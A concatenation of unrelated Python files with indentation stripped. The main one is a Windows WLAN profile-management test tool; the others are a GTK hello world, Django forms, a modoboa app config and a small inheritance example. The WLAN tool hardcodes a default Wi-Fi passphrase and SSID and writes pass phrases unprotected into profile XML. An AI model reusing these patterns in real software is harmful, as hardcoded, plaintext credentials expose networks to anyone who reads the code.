if pass_phrase is not None:
# change the protected element from true to false in <sharedKey>
sNewXML = reProt.sub('<{0}>{1}</{0}>'.format( 'protected','false'), sNewXML, 1)
# change the keyMaterial element to the new pass phrase in <sharedKey>
sNewXML = reKeyM.sub('<{0}>{1}</{0}>'.format( 'keyMaterial', pass_phrase), sNewXML, 1)
# rename <name2> back to <name>
sNewXML = reProf2.sub('<{0}>{1}</{0}>'.format( 'name',newProfile), sNewXML, 1)
#print sNewXML
if saveNewProfile is not None:
open(saveNewProfile,'w').write(sNewXML)
# set the new profile
self.wlanSetProfile(iface, sNewXML)
def wlanDeleteProfile(self, iface, profile):
""" Delete a profile """
log.debug('WlanInterface wlanDeleteProfile() - profile:"%s"' % profile)
sProfile = c_wchar_p(profile)
ret = WlanDeleteProfile( self._handle,
byref(iface.InterfaceGuid),
sProfile,
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanScan(self, iface):
""" Requests that the native 802.11 Wireless LAN driver scan for available wireless networks. """
log.debug('WlanInterface wlanScan()')
ret = WlanScan( self._handle,
byref(iface.InterfaceGuid),
None,None,None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def __str__(self):
if self._handle is None:
return 'Not open'
if self._lstIfaces:
s = '%d interfaces : %s' % (len(self._lstIfaces),','.join(self._lstIfaces))
if self._funcCallback is not None:
s += ' callback'
return s
def show_wifi_interfaces():
""" test function """
log.debug('show_wifi_interfaces')
NegotiatedVersion = DWORD()
ClientHandle = HANDLE()
ret = WlanOpenHandle(1, None, byref(NegotiatedVersion), byref(ClientHandle))
if ret != ERROR_SUCCESS:
raise WinError(ret)
try:
# find all wireless network interfaces
pInterfaceList = pointer(WLAN_INTERFACE_INFO_LIST())
ret = WlanEnumInterfaces(ClientHandle, None, byref(pInterfaceList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
try:
ifaces = customresize(pInterfaceList.contents.InterfaceInfo,
pInterfaceList.contents.NumberOfItems)
# find each available network for each interface
for iface in ifaces:
print "\nInterface: %s %s\n" % (iface.strInterfaceDescription, iface.isState)
pAvailableNetworkList = pointer(WLAN_AVAILABLE_NETWORK_LIST())
ret = WlanGetAvailableNetworkList(ClientHandle,
byref(iface.InterfaceGuid),
0,
None,
byref(pAvailableNetworkList))
if ret != ERROR_SUCCESS:
# raise WinError(ret)
raise WindowsError(ret)
try:
print '%-30s %-4s %s' % ('SSID','Qual','C:Connectable S:Secure P:Profile')
print '%-30s %-4s' % ('====','====')
avail_net_list = pAvailableNetworkList.contents
networks = customresize( avail_net_list.Network, avail_net_list.NumberOfItems)
for network in networks:
ssid = network.dot11Ssid.SSID[:network.dot11Ssid.SSIDLength]
sigQual = network.wlanSignalQuality
sConn = ' '
sDesc = ''
if network.NetworkConnectable:
sDesc += 'C'
if network.SecurityEnabled:
sDesc += 'S'
if network.Flags & WLAN_AVAILABLE_NETWORK_CONNECTED:
sConn = '*'
if network.Flags & WLAN_AVAILABLE_NETWORK_HAS_PROFILE:
sDesc += 'P'
print "%-30s %3d%% %s %s" % ( ssid, sigQual, sConn, sDesc)
finally:
WlanFreeMemory(pAvailableNetworkList)
finally:
WlanFreeMemory(pInterfaceList)
finally:
WlanCloseHandle( ClientHandle, None)
from menu import MenuItem, Menu, InputException
xmlTemplate = """
<?xml version="1.0">
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>$PROFILE_NAME$</name>
<SSIDConfig>
<SSID>
<name>$SSID$</name>
</SSID>
<nonBroadcast>false</nonBroadcast>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>manual</connectionMode>
<autoSwitch>false</autoSwitch>
<MSM>
<security>
<authEncryption>
<authentication>WPA2PSK</authentication>
<encryption>AES</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>$PASS_PHRASE$</keyMaterial>
</sharedKey>
</security>
</MSM>
</WLANProfile>
"""
uniXmlTemplate = unicode(xmlTemplate)
class WifiMenu(Menu):
_dctSources = { 'all' : WLAN_NOTIFICATION_SOURCE_ALL,
'acm' : WLAN_NOTIFICATION_SOURCE_ACM,
'hnwk' : WLAN_NOTIFICATION_SOURCE_HNWK,
'ihv' : WLAN_NOTIFICATION_SOURCE_IHV,
'msm' : WLAN_NOTIFICATION_SOURCE_MSM,
'onex' : WLAN_NOTIFICATION_SOURCE_ONEX,
'sec' : WLAN_NOTIFICATION_SOURCE_SECURITY,
}
_sources = '|'.join(_dctSources.keys())
def __init__(self, useCallback=False, cmdFile=None):
Menu.__init__(self, cmdFile, menuSize=80 )
self.wlan = WlanInterface(useCallback=useCallback)
self.wlan.updateDesc()
# add menu items
self.addMenuItem( MenuItem( 'si', '', 'Show interfaces' , self._showInterfaces) )
self.addMenuItem( MenuItem( 'il', '<networks|n>', 'run enumInterfaces() and list' , self._ifList) )
self.addMenuItem( MenuItem( 'co', 'profile <if=name> <iface=index>', 'Connect to a network' , self._ifConnect) )
self.addMenuItem( MenuItem( 'di', '<if=name> <iface=index>', 'Disconnect from a network' , self._ifDisconnect) )
self.addMenuItem( MenuItem( 'gp', 'profile <if=name> <iface=index>', 'Get Profile' , self._ifGetProfile) )
self.addMenuItem( MenuItem( 'sp', 'profile <ssid=value> <pp=value> <if=name> <iface=index>', 'Set Profile' , self._ifSetProfile) )
self.addMenuItem( MenuItem( 'cp', 'profile new_profile <if=name> <iface=index> <ssid=ssid> <pp=pass_phrase>', 'Copy Profile' , self._ifCopyProfile) )
self.addMenuItem( MenuItem( 'dp', 'profile <if=name> <iface=index>', 'Delete a Profile' , self._ifDeleteProfile) )
self.addMenuItem( MenuItem( 'is', '<if=name> <iface=index>', 'Scan an interface' , self._ifScan) )
self.addMenuItem( MenuItem( 'cn', '<source=%s> <ignoreDups> <clear>' % WifiMenu._sources, 'Register/Deregister the notification callback' , self._ifRegNotify) )
self.updateHeader()
def shutdown(self):
self.wlan.close()
def updateHeader(self):
self.header = 'wlan: %s' % self.wlan
def _showInterfaces(self):
show_wifi_interfaces()
def _ifList(self):
""" list all interfaces available """
bNetworks = False
for cmd in self.lstCmd[1:]:
if cmd == 'networks' or cmd == 'n':
bNetworks = True
print 'enum interfaces ...'
with self.wlan.enumInterfaces() as wlanIfData:
# find each available network for each interface
# for n,iface in enumerate(wlanIfData.ifaces):
for n,iface in enumerate(wlanIfData):
print "%d : %-40s state:%s" % (n,iface.strInterfaceDescription, iface.getState())
if bNetworks:
with self.wlan.getAvailableNetworks(iface) as wlanNetData:
print ' %-15s %-30s %-15s %s' % ('Profile', 'SSID','Qual (dbm)','C:Connectable S:Secure P:Profile')
print ' %-15s %-30s %-15s' % ('=======', '====','==========')
for nw in wlanNetData:
sConn = ' '
sDesc = ''
if nw.isConnectable():
sDesc += 'C'
if nw.isSecure():
sDesc += 'S'
if nw.isConnected():
sConn = '*'
if nw.hasProfile():
sDesc += 'P'
print ' %-15s %-30s %3d%% %.1f %s %s' % (nw.getProfileName(), nw.getSSID(), nw.getSignalQuality(), nw.getSignalQualityInDBM(), sConn, sDesc)
def _ifConnect(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanConnect(iface, profile)
def _ifDisconnect(self):
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[1:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanDisconnect(iface)
def _ifGetProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
saveToFile = profile + '.prof'
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
sXML = self.wlan.wlanGetProfile(iface, profile, saveToFile)
log.debug(sXML)
hexDump(sXML, msg='Get', logFunc=log.debug)
xml = open(saveToFile,'r').read()
print xml
def _ifCopyProfile(self):
if len(self.lstCmd) < 3:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
newProfile = self.lstCmd[2]
ssid = None
pass_phrase = 'mimosanetworks'
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
elif lst[0] == 'ssid' and len(lst) == 2:
ssid = lst[1]
elif lst[0] == 'pp' and len(lst) == 2:
pass_phrase = lst[1]
saveOrigProfile = profile + '.prof'
saveNewProfile = newProfile + '.prof'
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanCopyProfile(iface, profile, newProfile, ssid=ssid, pass_phrase=pass_phrase,
saveNewProfile=saveNewProfile, saveOrigProfile=saveOrigProfile)
def _ifSetProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
passPhrase = 'mimosanetworks'
ssid = 'mimosaM016'
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
elif lst[0] == 'ssid' and len(lst) == 2:
ssid = lst[1]
elif lst[0] == 'pp' and len(lst) == 2:
passPhrase = lst[1]
# get profile XML from template string
proXML = uniXmlTemplate
proXML = proXML.replace('$PROFILE_NAME$', profile)
proXML = proXML.replace('$SSID$', ssid)
proXML = proXML.replace('$PASS_PHRASE$', passPhrase)
print proXML
hexDump( proXML, msg='Set', logFunc=log.debug)
#print x
# get profile XML from interface
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanSetProfile(iface, proXML)
def _ifDeleteProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanDeleteProfile(iface, profile)
def _ifScan(self):
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanScan(iface)
def _ifRegNotify(self):
""" cn <source=value> <ignoreDups> <clear> """
source = WLAN_NOTIFICATION_SOURCE_ALL
ignoreDups = False
clear = False
for cmd in self.lstCmd[1:]:
lst = cmd.split('=')
if lst[0] == 'source' and len(lst) == 2:
lst = lst[1].split('|')
source = 0
for src in lst:
if src in dctSources:
source |= dctSources[src]
else:
raise Exception( 'source type "%s" not supported' )
elif lst[0] == 'ignoreDups':
ignoreDups = True
elif lst[0] == 'clear':
clear = True
self.wlan.createNotificationCallback(sources=source, ignoreDups=ignoreDups, clearAll=clear)
if __name__ == '__main__':
import logging
from optparse import OptionParser
TLLog.config( 'wlan_test.log', defLogLevel=logging.INFO )
DEFAULT_LOG_ENABLE = 'wlan'
# build the command line arguments
parser = OptionParser()
parser.add_option( "-m", "--logEnable", dest="lstLogEnable", default=DEFAULT_LOG_ENABLE,
help='Comma separated list of log modules to enable, * for all. Default is "%s"' % DEFAULT_LOG_ENABLE)
parser.add_option( '', "--useCallback", dest="useCallback", action="store_true", default=False,
help='Enable usage of the Wlan callback notifications. Default is do not use')
# parse the command line and set values
(options, args) = parser.parse_args()
# makes Control-break behave the same as Control-C on windows
import signal
signal.signal( signal.SIGBREAK, signal.default_int_handler )
## for wing IDE object lookup, code does not need to be run
#if 0:
#assert isinstance(gga, GPGGA)
#assert isinstance(gsa, GPGSA)
#assert isinstance(sat, Satellite)
try:
log.info( '=================================' )
log.info( 'wlan_test starting' )
# update log options
logOptions(options.lstLogEnable)
menu = WifiMenu(useCallback=options.useCallback)
menu.runMenu()
finally:
log.info( 'wlan_test exiting' )
|
# All copyrights and related or neighbouring rights waived under CC0.
# http://creativecommons.org/publicdomain/zero/1.0/
# To the extent possible under law, Andrew Chadwick has waived all
# copyright and related or neighboring rights to this program. This
# program is published from: United Kingdom.
"""Fairly minimal GTK3 and Cairo Hello World."""
import math
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
import cairo
def main():
t = Gtk.Label(
label = "Hello, GTK!",
hexpand = True,
vexpand = False,
)
d = Gtk.DrawingArea(
hexpand = True,
vexpand = True,
)
d.set_size_request(300, 250)
d.connect("draw", draw_cb)
g = Gtk.Grid(
row_spacing = 12,
column_spacing = 12,
border_width = 18,
)
g.attach(d, 0, 0, 1, 1)
g.attach(t, 0, 1, 1, 1)
w = Gtk.Window(
title = "hello",
)
w.set_default_size(400, 300)
w.add(g)
w.connect("destroy", Gtk.main_quit)
w.show_all()
Gtk.main()
def draw_cb(da, cr):
cr.set_source_rgb(0.3, 0.3, 0.4)
cr.paint()
cr.set_line_width(10)
w = da.get_allocated_width()
h = da.get_allocated_height()
cr.arc(w/2.0, h/2.0, min(w, h)/2.0 - 20, 0, 2*math.pi)
cr.set_source_rgb(0.8, 0.7, 0.2)
cr.stroke()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from gui.models import News,Report
from django.utils.translation import gettext as _
class NewsForm(forms.ModelForm):
class Meta:
model = News
fields = ('title', 'imagen', 'resumen','content',)
labels = {
'title': _('Título'),
}
error_messages = {
'title': {
'required': _("El campo 'Título' es requerido"),
},
'imagen': {
'required': _("Una 'Imagen' es requerida"),
},
'resumen': {
'required': _("El campo 'Resumen' es requerido"),
},
'content': {
'required': _("El campo 'Contenido' es requerido"),
},
}
class ReportForm(forms.ModelForm):
class Meta:
model = Report
fields = ('title', 'fileReport',)
error_messages = {
'title': {
'required': _("El campo 'Título' es requerido"),
},
'fileReport': {
'required': _("Un 'Documento' es requerido"),
},
}
|
"""App config for limits."""
from django.apps import AppConfig
from django.utils.translation import gettext as _
def load_limits_settings():
"""Load settings."""
from modoboa.parameters import tools as param_tools
from . import app_settings
from .api.v2 import serializers
param_tools.registry.add("global", app_settings.ParametersForm, _("Limits"))
param_tools.registry.add2(
"global", "limits", _("Limits"), app_settings.GLOBAL_PARAMETERS_STRUCT,
serializers.LimitsGlobalParemetersSerializer
)
class LimitsConfig(AppConfig):
"""App configuration."""
name = "modoboa.limits"
verbose_name = "Modoboa admin limits"
def ready(self):
load_limits_settings()
from . import handlers # NOQA:F401
|
## Santosh Khadka
class Animal():
def __init__(self):
print("Animal created")
def who_am_i(self):
print("I am an animal")
def eat(self):
print("I am eating")
class Dog(Animal): # inherits from the Animal(base class) class. Dog derives from Animal class
def __init__(self):
Animal.__init__(self)
print("Dog created")
def who_am_i(self):
print("I am a dog!")
Budd = Dog()
Budd.eat() # inherits from Animal class even though dog doesnt have eat() method
Budd.who_am_i() # Base class method overwritten
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.